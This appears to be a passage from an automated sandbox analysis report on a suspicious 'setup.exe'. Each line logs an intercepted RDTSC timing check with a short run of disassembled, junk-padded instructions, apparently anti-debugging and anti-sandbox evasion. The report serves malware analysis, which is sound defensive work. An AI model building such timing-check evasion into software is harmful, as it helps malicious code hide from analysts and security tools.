Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FC6C second address: 64FC76 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FD93 second address: 64FD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FD97 second address: 64FDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jne 00007FC169461AB5h 0x00000014 js 00007FC169461A96h 0x0000001a jmp 00007FC169461AA9h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FDCD second address: 64FDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF35 second address: 64FF3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF3B second address: 64FF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF41 second address: 64FF4B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC169461A9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 659FD9 second address: 659FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 659FE4 second address: 65A018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC169461AA5h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A310 second address: 65A316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A316 second address: 65A31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A31C second address: 65A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 je 00007FC16945A276h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FC16945A276h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A339 second address: 65A33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A33D second address: 65A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC16945A27Ch 0x0000000e jbe 00007FC16945A27Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65ACD5 second address: 65ACDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65ACDD second address: 65ACE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65BBA3 second address: 65BBAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 663058 second address: 663069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC16945A276h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 663069 second address: 66307F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC169461A9Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 662D8A second address: 662D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6661C7 second address: 6661CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F48F second address: 66F4A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC16945A278h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4A8 second address: 66F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC169461A9Ch 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4BB second address: 66F4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4C2 second address: 66F4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F481 second address: 67F486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F306 second address: 67F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F310 second address: 67F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC16945A276h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855DC second address: 6855E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855E0 second address: 6855E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855E4 second address: 6855F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855F2 second address: 6855F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68783E second address: 687872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Fh 0x00000009 js 00007FC169461A96h 0x0000000f jmp 00007FC169461AA7h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 688F74 second address: 688F7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E150 second address: 68E158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E2B1 second address: 68E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E2B5 second address: 68E2B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E68B second address: 68E6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 jmp 00007FC16945A282h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E6BB second address: 68E6ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC169461A9Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E6ED second address: 68E6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 693760 second address: 693764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 693764 second address: 693771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DC2 second address: 6A2DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DDC second address: 6A2DE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DE9 second address: 6A2DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DF2 second address: 6A2E1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FC16945A285h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B0635 second address: 6B063F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B063F second address: 6B065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A289h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B065C second address: 6B067A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B067A second address: 6B0699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC16945A288h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B3476 second address: 6B347E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B347E second address: 6B3482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B3482 second address: 6B3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B31CD second address: 6B31D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B31D1 second address: 6B31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC169461A98h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f js 00007FC169461AA0h 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBDD5 second address: 6CBE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC16945A286h 0x0000000b jmp 00007FC16945A27Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBE03 second address: 6CBE19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC169461A96h 0x00000008 jmp 00007FC169461A9Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBE19 second address: 6CBE79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A283h 0x00000008 jmp 00007FC16945A284h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007FC16945A2A5h 0x00000020 jmp 00007FC16945A27Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC16945A281h 0x0000002c jbe 00007FC16945A276h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB039 second address: 6CB043 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB043 second address: 6CB063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 jo 00007FC16945A276h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB063 second address: 6CB069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB58C second address: 6CB590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB590 second address: 6CB5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA9h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CE7C6 second address: 6CE7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CE84C second address: 6CE856 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D00F7 second address: 6D00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D1BBD second address: 6D1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D1BC1 second address: 6D1BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D178C second address: 6D17AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FC169461A9Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D17AB second address: 6D17B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D3521 second address: 6D353A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D353A second address: 6D353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D353E second address: 6D3552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D3552 second address: 6D3563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FC16945A276h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110160 second address: 5110187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110187 second address: 5110197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100042 second address: 5100056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100056 second address: 5100128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC16945A27Ah 0x0000001a jmp 00007FC16945A285h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC16945A27Ch 0x00000029 adc cx, B4C8h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007FC16945A288h 0x0000003a add ah, 00000028h 0x0000003d jmp 00007FC16945A27Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 pushad 0x00000047 call 00007FC16945A280h 0x0000004c mov bh, ah 0x0000004e pop edi 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007FC16945A27Fh 0x0000005a add si, CDCEh 0x0000005f jmp 00007FC16945A289h 0x00000064 popfd 0x00000065 push eax 0x00000066 pop edi 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100128 second address: 5100144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130B1A second address: 5130B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC16945A27Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D00DF second address: 50D012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1C78C7E3h 0x00000008 pushfd 0x00000009 jmp 00007FC169461AA8h 0x0000000e xor ecx, 5E5AB828h 0x00000014 jmp 00007FC169461A9Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D012D second address: 50D0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0133 second address: 50D0137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0137 second address: 50D013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D013B second address: 50D0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bh, 9Eh 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007FC169461AA8h 0x00000015 adc cl, 00000018h 0x00000018 jmp 00007FC169461A9Bh 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC169461AA2h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D025E second address: 50D0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0D04 second address: 50F0D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 18h 0x00000005 mov cx, 6ADFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FC169461AA2h 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007FC169461AA7h 0x0000001c and esi, 00E9778Eh 0x00000022 jmp 00007FC169461AA9h 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0D5F second address: 50F0D7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A280h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0D7D second address: 50F0D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0843 second address: 50F0859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A282h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0859 second address: 50F0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC169461AA7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0892 second address: 50F0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
